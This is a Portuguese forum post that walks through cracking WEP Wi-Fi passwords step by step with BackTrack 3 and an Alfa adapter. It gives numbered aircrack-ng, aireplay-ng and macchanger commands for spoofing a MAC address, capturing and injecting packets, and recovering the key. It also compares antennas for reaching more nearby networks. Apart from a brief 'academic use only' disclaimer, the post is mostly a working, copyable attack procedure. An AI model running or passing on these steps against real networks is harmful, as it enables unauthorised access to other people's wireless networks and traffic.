Como o próprio administrador "mferreira" falou:
"lembrem-se, use apenas para fins acadêmicos. Não tenho responsabilidade nenhuma sobre isso caso você use para outros fins. Você foi avisado!!!"
"A idéia desta apresentação não é incentivar os ataques, mas sim mostrar o quanto as pessoas estão vulneráveis nos dias de hoje, e muitos achando que estão protegidos pelo fato de utilizarem criptografia."
Olá,
Sou novato no Fórum e espero estar ajudando um pouco !
Aqui em casa foi tudo muito tranqüilo para fazer o teste de quebrar minha primeira senha WEP, e depois desta primeira vez, ja fiz varios outros testes!
Estou usando o Alfa de 500mh (Seu Chipset é o Realtek 8187L)
Quem quiser ver como ele é, é só ver esses videos no youtube
Video 1 -
Este texto será substituído
Video 2 -
Este texto será substituído
Video 3 -
Este texto será substituído
Video 4 -
Este texto será substituído
OBS: Por ele ser mais potente, esse adaptador utiliza 2 portas USB para se conectar!
Simplesmente fiz o download do Backtrack 3 no modo Live CD (Que roda direto do Boot).
Fiz o Download neste link
http://www.remote-exploit.org/cgi-bi...version=bt3-cd
1- Coloque o cd do BackTrack 3
2- Reinicie o computador e entre no Backtrack 3 no modo boot (Quando entrar na primeira tela do boot do Back Track é só dar Enter na primeira opção!
3- Conecte o Alfa 500mW.
4- siga exatamente este tutorial do Youtube
Este texto será substituído
5- Este tutorial esta em Inglês, mas é só você copiar os comandos e trocar só o que vc tem que trocar, como o bssid e o canal que vc vai monitorar e injetar os pacotes!
OBS: Se mesmo assim você não entendeu o video, no final deste texto eu excrevi como fazer!
6-Eu costumo pegar senhas com 15.000 a 25.000 pacotes, só teve uma vez que levei uns 60.000 pra pegar uma senha de 26 dígitos, que testei com um amigo meu no pc dele! E essa semana agora pediu 350.000 pacotes, mais estava injetando tão rapido que foi tranquilo! As vezes os números de pacotes coletados aumentam beem rápido e outras vezes somente 3 pacotes por segundo, dai deixa rolando e vai comer e ver tv, que entre 3 a 5 horas ta tudo beleza! hehe
Mais funcionou perfeitamente! E o bom é que o Chipset do Alpha 8187L é o mesmo usado no video!
Sempre usei o Windows, e nunca tinha usado o Linux, muito menos por Live CD!
Em dezembro dependendo do Dolar, vou comprar alguns nos USA e vender aqui no Brasil! Quando chegar posto no Forum!
Se você não entendeu nada do video no Youtube porque ele esta em Inglês, eu escrevi aqui os comandos, é só seguindo passo a passo, até numerei.. rs
1- airmon-ng stop wlan0 [Enter]
2- ifconfig wlan0 down [Enter]
3- macchanger --mac 00:11:22:33:44:55 wlan0 [Enter]
4- airmon-ng start wlan0 [Enter] --> (Pode demorar +- 7 segundos)
Agora que seu Alfa ou o seu adaptador compatível esta preparado, vamos para o próximo passo.
5- airodump-ng wlan0 [Enter] ---> (Quando você digitar esse comando ele vai mostrar todas as redes wireless que sua placa capturar, seu bssid, canal, numero de pacaotes e etc... mas vamos usar somente os 2 primeiros (bssid) e o (numero do canal).
6- airodump-ng -c --->(digite o canal da rede que você quer testar a segurança) -w (digite qualquer coisa para nomear o arquivo, que sera armazenado os pacotes, como por exemplo "dlink") --bssid (coloque o endereço MAC ou o bssid que da na mesma) wlan0
O item 6 em um exemplo usando o bssid "00 11 2F 61 28 F5" no canal "6" nome da rede "dlink" ficaria assim:
-->airodump-ng -c 6 -w dlink --bssid 00 11 2F 61 28 F5 wlan0 [Enter]
Agora vamos preparar para conectar na rede e injetar
7- aireplay-ng -1 0 -a (coloca o bssid) -h 00:11:22:33:44:55 wlan0
Exemplo do item 7 --> aireplay-ng -1 0 -a 00 11 2F 61 28 F5 -h 00:11:22:33:44:55 wlan0 [enter]
8- aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF (esses FF são em letra maiúscula, e você repetira 6 vezes) -b (digite o bssid) -h 00:11:22:33:44:55 wlan0
Exemplo do item 8 --> aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00 11 2F 61 28 F5 -h 00:11:22:33:44:55 wlan0 [Enter]
9- aircrack-ng dlink-01.cap (No nosso caso, como coloquei dlink, vai ficar dlink-01.cap, se vc colocar rede, vai ficar rede-01.cap, se colocar wifi, vai ficar wifi-01.cap, etc..etc..etc, sempre "-01" depois do nome quando for usar o Aircrack)
Exemplo do item 9 --> aircrack-ng dlink-01.cap [Enter]
Agora vamos digitar esse comando para decodificar os pacates que você esta capturando e assim descobrir a senha WEP! Depois que digitar e apertar Enter, é só deixar rolando que ele atualiza o bando de dados a cada 5000 pacotes!
OBS: O que eu digitei dentro dos parênteses é só aquilo que esta dentro dele, não digitem os parênteses! hehe Vai saber, sempre tem gente nesse mundo que não percebe esses detalhes!
-- Somente o FF:FF:FF:FF:FF:FF que esta em letra maiúscula, o reste digita tudo em letras minúsculas!
OS DRIVERS MAIS ATUALIZADOS DAS PLACAS QUE POSSUEM O CHIPSET 8187L ESTÃO NESTE LINK:
UPDATE: Neste Link vocês vão encontrar os novos Drivres para Windows XP, VISTA, Windows 7, Linux e Mac OS, do Alfa AWUS036H ou superiores-----> ALFA Network – WLAN, WiFi phone, ADSL, KVM, Bluetooth, PoE Products -- Driver
Vídeo guia para instalação dos Drivers no
Windows Vista -->
Este texto será substituído
Windows 7 -->
Este texto será substituído
No Back Track pra quem tem placas com Chip Sets compativeis como o meu, não tem a necessidade de instalar nenhum Driver no Back Track 3 pois ele ja vem com os drivers e com os programas instalados!
Este pequeno Tutorial serve não só com o meu Alfa USB mas também para todas as placas compatíveis com modo monitor e modo injeção no Black Track 3.
Estas são as antenas que comparei e uso no meu Alfa:
1 - A própria antena Omini de 2 dBi do Adaptador.
2 - Antena Omini de 5 dBi do meu super AP GTS.
3 - Antena Omini de 8 dBi Modelo 24080-SMA = R$29,00
4 - Antena Omini de 10 dBi da Air Live modelo WAI-101 R$70,00
5 - Antena Direcional 60 º de 12 dBi Aquário R$50,00
---> Seguinte, quando sei exatamente de onde vem o sinal tive um resultado muito melhor com a Aquário de 12 dBi (Calibrando sua posição com o programa Wirelessmon 3.0), por morar em prédio, e as vezes a janela não proporciona uma boa posição para colocar a Aquário um pouco pra fora da mesma (primeiro que sem um suporte correto a antena poderia cair.....), sendo assim tive que optar por uma Omini (que é MUITAS vezes mais leve e sem perigos de cair da janela), tendo melhor rendimento com a original de 2 dBi e a Oiw de 8dbi, não sei se minha Air Live veio com problemas, mas o resultado foi quase igual ou inferior as outras Ominis! Resumindo 99% do tempo tenho feito uso da setorial 60º da Aquário de 12 dBi! Esses resultados foram aqui comigo, e podem ter resultados diferentes com pessoas que moram em lugares deferentes, com interferências e obstáculos diferentes! Outra detalhe, é que essas antenas podem ter seus resultados diferenciados se forem colocadas em um AP para uso na distribuição de sinal!
Neste ótimo site você vai encontrar bem organizado os programas para Windows e Linux usados para monitorar redes Wireless, SnifferS, e ETC.....
Wardriving Software Downloads - WardrivingOnline.com
Fotos:
Meu Desktop - Mostrando as conexões disponíveis, isso pra onde a antena esta virada, se virar pro outro lado também aparecem mais redes. Ja da pra ver que redes com segurança a WPA e WPA2 estão crescendo! Foi retirado os nomes das redes!
Abraço e boa sorte pra todos!
Rodrigo Pita
"Campanha anti Sangue-Suga. Seja participativo e ajude o próximo."
Modo Linear
